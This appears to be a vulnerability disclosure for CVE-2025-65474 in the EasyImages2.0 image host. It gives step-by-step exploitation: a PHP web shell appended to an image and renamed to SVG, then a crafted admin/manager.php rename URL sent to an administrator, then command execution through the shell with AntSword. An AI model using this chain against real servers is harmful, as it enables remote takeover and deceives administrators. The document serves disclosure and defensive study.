CVE-2025-65474
icret/EasyImages2.0/2.8.6 before
Remote
An attacker first embeds a PHP web shell into a normal image, renames it to an SVG file to bypass upload compression, uploads it to the EasyImages2.0 system, then constructs a malicious admin/manager.php URL (with p for the file directory, ren for the SVG filename, and to for a PHP filename) to trick an administrator into clicking "this renames the SVG to a PHP file, enabling the attacker to use tools like AntSword for remote code execution.
github:https://github.com/icret/EasyImages2.0
target:http://xxx.com/admin/manager.php?p=xxx&ren=xxx&xxx
直接使用docker run -itd --name easyimage -p 8777:80 -e TZ=Asia/Shanghai -e PUID=1000 -e PGID=1000 -e DEBUG=false -v /root/data/docker_data/easyimage/config:/app/web/config -v /root/data/docker_data/easyimage/i:/app/web/i ddsderek/easyimage:latest命令启动环境
-
Start with a normal image, open it with a text editor, and append a web shell script at the end
-
Rename the file extension from
.png to.svgto avoid damage from image compression during upload. Upload the modified file to the image hosting service -
We obtained the address
http://x.x.x.x:8777/i/2025/11/04/z2b9th.svg and constructed the payload as:
http://x.x.x.x:8777/admin/manager.php?p=2025%2F11%2F04&ren=z2b9th.svg&to=congsec.phpWhere:
-
prepresents the image directory -
renis the original image name -
tois the modified filename
The exploit works by tricking an administrator into clicking the link, which rewrites the malicious SVG file into a PHP web shell, enabling server-side execution.
-
-
When the administrator clicks the link, the file is renamed to
congsec.php -
Use a tool like AntSword to connect to the web shell at
http://x.x.x.x:8777/i/2025/11/04/congsec.phpand execute arbitrary commands
